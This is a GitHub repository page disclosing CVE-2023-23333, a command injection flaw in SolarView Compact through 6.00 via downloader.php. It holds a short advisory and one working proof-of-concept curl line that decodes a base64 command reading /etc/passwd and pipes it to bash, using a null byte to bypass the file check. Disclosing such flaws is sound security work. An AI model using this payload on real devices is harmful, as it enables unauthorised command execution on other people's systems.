Skip to content

There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.

Timorlover/CVE-2023-23333

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Summary:

There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.

Vendor:

  • SolarView Compact

Affected Product:

  • SolarView Compact

Version:

  • SolarView Compact <=ver 6.00

poc:

curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0

Details:

Commands can be injected by bypassing internal restrictions by accessing the file parameter of the downloader.php page.

image

About

There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published